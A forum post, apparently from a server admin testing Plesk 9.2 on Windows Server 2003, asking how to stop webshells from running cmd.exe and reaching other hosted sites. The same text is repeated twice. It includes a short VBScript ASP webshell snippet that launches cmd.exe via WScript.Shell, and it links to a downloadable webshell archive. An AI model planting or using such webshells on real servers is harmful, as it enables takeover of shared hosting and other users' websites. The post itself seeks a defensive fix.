N
Nguyen Thang Long
Guest
I am testing plesk 9.2 on Windows server 2003.
I tried hack this server by webshell (aspx & asp)
Example:
When i ran :
<%@ Language=VBScript %>
<%
On Error Resume Next
Dim oScript
Dim gURL
gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Call oScript.Run ("c:\\WINDOWS\\system32\\cmd.exe",1,True)
%>
Then task manager of server running file cmd.exe by users is : IWAM_Plesk(Default)
Or when i used webshell (http://www.guru.net.vn/kshell_1.2.zip) , i can hacked website of other users in this server.
I used plesk tools maked sure permission of server , but it is not fix that problems.
I can't fix , who can secure , and fix that error ? Help me ?
Thanks so much !
I tried hack this server by webshell (aspx & asp)
Example:
When i ran :
<%@ Language=VBScript %>
<%
On Error Resume Next
Dim oScript
Dim gURL
gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Call oScript.Run ("c:\\WINDOWS\\system32\\cmd.exe",1,True)
%>
Then task manager of server running file cmd.exe by users is : IWAM_Plesk(Default)
Or when i used webshell (http://www.guru.net.vn/kshell_1.2.zip) , i can hacked website of other users in this server.
I used plesk tools maked sure permission of server , but it is not fix that problems.
I can't fix , who can secure , and fix that error ? Help me ?
Thanks so much !